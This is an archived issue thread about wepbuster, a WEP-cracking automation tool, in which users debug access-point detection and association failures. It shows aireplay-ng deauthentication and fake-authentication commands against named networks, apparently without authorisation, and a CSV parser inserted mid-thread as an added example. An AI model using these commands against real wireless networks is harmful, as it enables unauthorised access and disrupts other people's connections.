google-code-export / wepbuster

Automatically exported from code.google.com/p/wepbuster

still no find ap's #7

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
While freshly rebooted and making sure the drivers are loaded properly

Rebooted ok, and drivers loaded, see dmesg...

zd1211rw 1-7:1.0: phy0
usbcore: registered new interface driver zd1211rw
udev: renamed network interface wlan0 to wlan1

What do you see when you run "ifconfig"
# ifconfig 
eth0, eth1, lo, ...

wlan1     Link encap:Ethernet  HWaddr 00:02:72:6f:a2:f9  
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

What do you see when you run "iwconfig"

wlan1     IEEE 802.11bg  ESSID:""  
          Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated   
          Tx-Power=0 dBm   
          Retry min limit:7   RTS thr:off   Fragment thr=2352 B   
          Encryption key:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

What do you see when you run "airmon-ng"

wlan1       ZyDAS 1211  zd1211rw - [phy1]

Which Linux are you using?

Ubuntu 9.04 with your precompiled aircrack/airodump

Which wireless card/s are you using?
1. Chipset: Zydas
2. Driver: ZD1211RW

Which interfaces are you supposed to be using or expecting wepbuster to find?
1. as an injection interface: wlan1
2. as monitor interface: mon0

Which revision in SVN are you using?
aircrack-ng-1.0rc3_wepbuster.tgz

Did you change and recompile the aircrack-ng sources?
I use your precompiled files

What do you see when you do a "ps ax |grep perl && ps ax |grep air" while running the program

root     20912  0.4  0.0      0     0 pts/0    Z+   20:24   0:00 [airmon-ng] <defunct>
root     20964  0.0  0.0      0     0 pts/0    Z+   20:24   0:00 [airmon-ng] <defunct>
root     21098  0.0  0.0   3748  1108 pts/0    S+   20:24   0:00 airodump-ng mon0 -t wep -c 6 -n -w chan6

Did you try setting these three manually?

yes
1. $inject_iface: wlan1
2. $monitor_iface: mon0 
3. $mac_address: 00:02:72:6f:a2:f9

Did you read the "Troubleshooting" in the wiki???

Yes

Did you try running airodump-ng -t WEP using $monitor_iface and you are certain that you are seeing WEP-enabled access points and not some odd shaped object that looks like a nuclear silo?

;) yes...

 00:02:CF:B5:3C:30    4        2        0    0  12  54 . WEP  WEP         WLAN_F2
 00:01:38:6D:FA:C0    4        9        0    0   6  54 . WEP  WEP         WLAN_7F
 00:23:F8:90:E8:56    7        8        0    0   9  54 . WEP  WEP         PDG101A
 00:06:B1:20:EC:6A   15        8        1    0   1  11   WEP  WEP         <length:  8>

Did you run into some hot chick lately?

I do not know ;)

Original issue reported on code.google.com by mserrafo...@gmail.com on 5 Jun 2009 at 6:30

GoogleCodeExporter commented 9 years ago
sorry, i forgot to ask.. what did you see in the output of wepbuster??? =) in the 7th item, i'm seeing some defunct processes.. you might want to do a "pkill -9 air && pkill -9 perl" and start all over again..

Original comment by markjays...@gmail.com on 5 Jun 2009 at 7:06

GoogleCodeExporter commented 9 years ago
I do pkill -9 air && pkill -9 perl with the same result...

# perl wepbuster 

Detecting wireless interfaces...

---------------------------------------------------

Found wlan1...
Getting monitor interface...
monitor interface --> mon0

Found 1 useable wireless card(s)
 1) wlan1/mon0

MODE: crack (using: wlan1/mon0 == 00:02:72:6f:a2:f9)

Scanning channel 6 for WEP-enabled Access Points
......
Found 0 AP(s) on channel 6

Scanning channel 11 for WEP-enabled Access Points
......
Found 0 AP(s) on channel 11

Scanning channel 1 for WEP-enabled Access Points
......
Found 0 AP(s) on channel 1

Found no AP. Exiting...

 CH 11 ][ Elapsed: 16 s ][ 2009-06-06 16:57                                         

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID     

 00:1A:2B:3D:50:D0    8        5        0    0  11  54   WEP  WEP         JAZZTEL_87

 00:06:B1:20:EC:6A   13        6        0    0   1  11   WEP  WEP         <length: 8>
 00:02:CF:B5:3C:30   10       10        0    0  12  54 . WEP  WEP         WLAN_F2   

 00:23:F8:90:E8:56   10       14        0    0   9  54 . WEP  WEP         PDG101A 

Original comment by mserrafo...@gmail.com on 6 Jun 2009 at 2:57

GoogleCodeExporter commented 9 years ago
sometimes when this happens to me, all i do is just reload the driver and wait for a few seconds.. have you tried that?

Original comment by lem0ngr...@fastmail.fm on 6 Jun 2009 at 3:21

GoogleCodeExporter commented 9 years ago
yes, I tried that with no luck...

root@michael:/media/sdc1/home/marc/Desktop/tarball_staging# rmmod zd1211rw
root@michael:/media/sdc1/home/marc/Desktop/tarball_staging# modprobe zd1211rw
root@michael:/media/sdc1/home/marc/Desktop/tarball_staging# pkill -9 air && pkill -9 perl
root@michael:/media/sdc1/home/marc/Desktop/tarball_staging# ifconfig wlan1 down
root@michael:/media/sdc1/home/marc/Desktop/tarball_staging# perl wepbuster 

Detecting wireless interfaces...

---------------------------------------------------

Found wlan1...
Getting monitor interface...
monitor interface --> mon0

Found 1 useable wireless card(s)
 1) wlan1/mon0

MODE: crack (using: wlan1/mon0 == 00:02:72:6f:a2:f9)

Scanning channel 6 for WEP-enabled Access Points
......
Found 0 AP(s) on channel 6

Scanning channel 11 for WEP-enabled Access Points
......
Found 0 AP(s) on channel 11

Scanning channel 1 for WEP-enabled Access Points
......
Found 0 AP(s) on channel 1

Found no AP. Exiting...

Original comment by nandelb...@gmail.com on 9 Jun 2009 at 2:32

GoogleCodeExporter commented 9 years ago
did you try increasing the scan duration? also check if wepbuster is indeed executing the precompiled aircrack-ng programs. when you run wepbuster and finished scanning the first channel, hit ctrl+c and try to find if there is any .csv file created by airodump in the current directory. Open that csv and check if there is any AP listed. I'm suspecting that you did not tell wepbuster to use the modified aircrack-ng programs..

Original comment by markjays...@gmail.com on 9 Jun 2009 at 3:55
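
The CSV check suggested in the comment above can be scripted; this is an added example, not part of the original thread or of wepbuster. It assumes the stock airodump-ng CSV column layout (the modified build discussed here may differ), the function names are hypothetical, and the sample data is constructed.

```python
import csv
import io

# Constructed sample in the stock airodump-ng CSV layout (all values are made up).
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:00:00:00:00:01, 2009-06-09 10:00:01, 2009-06-09 10:00:20,  6,  54, WEP , WEP, ,  40,  12,  3,   0.  0.  0.  0,   7, LAB_WEP,
02:00:00:00:00:02, 2009-06-09 10:00:02, 2009-06-09 10:00:20,  6,  54, WPA2, CCMP, PSK,  35,  20,  0,   0.  0.  0.  0,   7, LAB_WPA,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:00:00:aa, 2009-06-09 10:00:05, 2009-06-09 10:00:19,  30,  9, 02:00:00:00:00:01,
"""


def parse_access_points(text):
    """Return one dict per AP row; the client ('Station MAC') section is ignored."""
    aps, header = [], None
    for row in csv.reader(io.StringIO(text)):
        cells = [c.strip() for c in row]
        if not any(cells):
            continue                      # blank separator lines
        if cells[0] == "BSSID":
            header = cells                # start of the AP table
            continue
        if cells[0] == "Station MAC":
            break                         # AP table is over
        # Simplification: an ESSID containing a comma would shift the columns.
        if header and len(cells) >= len(header) - 1:
            aps.append(dict(zip(header, cells)))
    return aps


def triage(text):
    """Classify a capture: did airodump-ng log nothing, or only non-WEP APs?"""
    aps = parse_access_points(text)
    wep = [ap for ap in aps if "WEP" in ap.get("Privacy", "")]
    if not aps:
        verdict = "capture-empty"   # nothing logged: driver, channel or binary issue
    elif not wep:
        verdict = "no-wep-seen"     # capture works, but no AP advertises WEP
    else:
        verdict = "wep-seen"        # APs were logged, so "Found 0 AP(s)" is a wrapper issue
    return verdict, [(ap["BSSID"], ap["channel"], ap["ESSID"]) for ap in wep]


if __name__ == "__main__":
    print(triage(SAMPLE_CSV))
```

The same listing doubles as an inventory of access points on your own network that still advertise WEP.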

GoogleCodeExporter commented 9 years ago
This is how I got the precompiled aircrack-ng and airodump-ng to work for me.
GOTO:
/usr/local/bin and /usr/local/sbin

look for aircrack-ng and airodump-ng and overwrite it. After that wepbuster should work fine. Also some OSes don't support -n and also iwconfig <interface> mode managed, so you might wanna remove those or comment out those lines. Hope this can help us all, so that we can get this to roll out in BackTrack 4-final.

Original comment by ghostfac...@gmail.com on 10 Jun 2009 at 3:32

GoogleCodeExporter commented 9 years ago
After restarting the process...

MODE: crack (using: wlan1/mon1 == 00:02:72:69:31:5c)

Scanning channel 6 for WEP-enabled Access Points
......
Found 0 AP(s) on channel 6

Scanning channel 11 for WEP-enabled Access Points
......
Found 1 AP(s) on channel 11

     BSSID      IV  CHANNEL SSID           ASSOCIATED CLIENTS

00:14:BF:C3:07:CB   3   11  mx          

Scanning channel 1 for WEP-enabled Access Points
......
Found 1 AP(s) on channel 1

     BSSID      IV  CHANNEL SSID           ASSOCIATED CLIENTS

B6:81:57:F4:64:BC   12  1   MX1901FA          00:00:0C:07:AC:00, 00:1E:0B:0C:92:FC,
00:0E:6A:92:15:A4, 00:1A:64:36:65:8C, 00:18:8B:8A:DF:11, 00:B0:C2:8D:B4:B6,
00:0C:29:C5:8E:47, 00:16:76:2D:30:A5

Total AP found: 2

Now starting to crack...

#########################################################

Pwning "mx" (00:14:BF:C3:07:CB)
Checking for mac filtering...
Can't associate. aireplay-ng died!

#########################################################

Pwning "MX1901FA" (B6:81:57:F4:64:BC)
Checking for mac filtering...
Can't associate. aireplay-ng died!

#########################################################

Can't associate

Original comment by nandelb...@gmail.com on 10 Jun 2009 at 9:20

GoogleCodeExporter commented 9 years ago
Try the latest SVN revision. Could be because of that -D option of aireplay-ng. If it doesn't work, read the latest revision of README.TXT, it contains the actual aireplay-ng commands used. Run it manually against those APs in question and see if you will get the same result.

Original comment by markjays...@gmail.com on 10 Jun 2009 at 9:37

GoogleCodeExporter commented 9 years ago
the same result with the latest revision (46)...

No valid channel entered. Using the default ( US = 1 6 11 )

MODE: crack (using: wlan1/mon3 == 00:02:72:69:31:5c)

Scanning channel 6 for WEP-enabled Access Points
......
Found 0 AP(s) on channel 6

Scanning channel 1 for WEP-enabled Access Points
......
Found 0 AP(s) on channel 1

.
Scanning channel 11 for WEP-enabled Access Points
.....
Found 1 AP(s) on channel 11

     BSSID      IV  CHANNEL SSID           ASSOCIATED CLIENTS

00:14:BF:C3:07:CB   609 11  mx          

Total AP found: 1

Now starting to crack...

#########################################################

Pwning "mx" (00:14:BF:C3:07:CB)
Checking for mac filtering...
Can't associate. aireplay-ng died!

#########################################################

Executing the commands individually...

root@mula-laptop:/home/mula/wepbuster-read-only# aireplay-ng -0 1 -a 00:14:BF:C3:07:CB mon3 -h 00:02:72:69:31:5c 2>&1
11:47:56  Waiting for beacon frame (BSSID: 00:14:BF:C3:07:CB) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
11:47:56  Sending DeAuth to broadcast -- BSSID: [00:14:BF:C3:07:CB]
root@mula-laptop:/home/mula/wepbuster-read-only# aireplay-ng -1 1 -a 00:14:BF:C3:07:CB -e mx mon3 -h 00:02:72:69:31:5c 2>&1
11:48:42  Waiting for beacon frame (BSSID: 00:14:BF:C3:07:CB) on channel 11

11:48:42  Sending Authentication Request (Open System)

11:48:44  Sending Authentication Request (Open System)

11:48:46  Sending Authentication Request (Open System)

11:48:48  Sending Authentication Request (Open System)

11:48:50  Sending Authentication Request (Open System)

11:48:52  Sending Authentication Request (Open System)

11:48:54  Sending Authentication Request (Open System)

11:48:56  Sending Authentication Request (Open System)

11:48:58  Sending Authentication Request (Open System)

11:49:00  Sending Authentication Request (Open System)

11:49:02  Sending Authentication Request (Open System)

11:49:04  Sending Authentication Request (Open System)

11:49:06  Sending Authentication Request (Open System)

11:49:08  Sending Authentication Request (Open System)

11:49:10  Sending Authentication Request (Open System)

11:49:12  Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
      the transmit rate.

root@mula-laptop:/home/mula/wepbuster-read-only# aireplay-ng -1 6000 -o 1 -q 10 -a 00:14:BF:C3:07:CB -e mx mon3 -h 00:02:72:69:31:5c
11:49:48  Waiting for beacon frame (BSSID: 00:14:BF:C3:07:CB) on channel 11

11:49:48  Sending Authentication Request (Open System)

11:49:50  Sending Authentication Request (Open System)

11:49:52  Sending Authentication Request (Open System)

11:49:54  Sending Authentication Request (Open System)

11:49:56  Sending Authentication Request (Open System)

11:49:58  Sending Authentication Request (Open System)

11:50:00  Sending Authentication Request (Open System)

11:50:02  Sending Authentication Request (Open System)

11:50:04  Sending Authentication Request (Open System)

11:50:06  Sending Authentication Request (Open System)

11:50:08  Sending Authentication Request (Open System)

11:50:10  Sending Authentication Request (Open System)

11:50:12  Sending Authentication Request (Open System)

11:50:14  Sending Authentication Request (Open System)

11:50:16  Sending Authentication Request (Open System)

11:50:18  Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
      the transmit rate.

I think the problem is with this card... can't associate. But one thing... with the same card and BackTrack 3 I can crack this AP... what's happening?

Original comment by nandelb...@gmail.com on 10 Jun 2009 at 9:52

GoogleCodeExporter commented 9 years ago
you see.. it is no longer the problem of the script.. for that, you have to ask the aircrack-ng authors.. They even gave several reasons why it failed, right?. So there you have it... :-)

Original comment by markjays...@gmail.com on 10 Jun 2009 at 9:57

GoogleCodeExporter commented 9 years ago
;)

Thank you! And sorry for spending your time!

Original comment by nandelb...@gmail.com on 10 Jun 2009 at 10:33

GoogleCodeExporter commented 9 years ago

Original comment by markjays...@gmail.com on 12 Jun 2009 at 5:06